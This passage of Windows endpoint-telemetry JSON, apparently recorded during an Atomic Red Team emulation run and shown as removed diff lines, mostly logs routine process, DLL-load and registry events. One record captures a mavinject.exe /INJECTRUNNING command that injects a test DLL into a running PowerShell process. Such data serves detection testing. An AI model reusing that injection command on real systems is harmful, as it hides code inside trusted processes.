"uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": 
"C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "msctf.dll", - "image_path": "C:\\Windows\\System32\\msctf.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": 
"registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": 
"LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "registry", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573503080000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "process", - "pid": 976, - "process_name": "Temptcm.tmp", - "process_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "subtype": "terminate", - "timestamp": 131883573503230000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010E3BC5501}" - }, - { - "event_type": "file", - "file_name": "TEMPTCM.TMP-3991A72E.pf", - "file_path": "C:\\Windows\\Prefetch\\TEMPTCM.TMP-3991A72E.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573503230000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "process", - "pid": 5572, - "process_name": "cmd.exe", - 
"process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573503230000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010ECBB5501}" - }, - { - "event_type": "process", - "pid": 1852, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573503390000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7708, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573503510000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573503390000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573503390000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573503390000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" - }, - { - "event_type": 
"image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573503390000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573503540000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" - }, - { - "event_type": "process", - "pid": 7708, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573503540000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001046C45501}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573504480000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573504480000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 
131883573504640000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573504640000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573504640000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573504640000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2680, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883573504640000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573549480000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - 
"registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573549480000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573549480000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "file", - "file_name": "SVCHOST.EXE-7F44DDFD.pf", - "file_path": "C:\\Windows\\Prefetch\\SVCHOST.EXE-7F44DDFD.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573557450016, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\mavinject.exe\" 7036 /INJECTRUNNING C:\\AtomicRedTeam\\atomics\\T1055\\src\\x64\\T1055.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7792, - "ppid": 7036, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "subtype": "create", - "timestamp": 131883573570600000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": 
"{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 
131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "mavinject.exe", - "image_path": 
"C:\\Windows\\System32\\mavinject.exe", - "pid": 7792, - "process_name": "mavinject.exe", - "process_path": "C:\\Windows\\System32\\mavinject.exe", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CBED-5C05-0000-0010316A5601}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573570740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
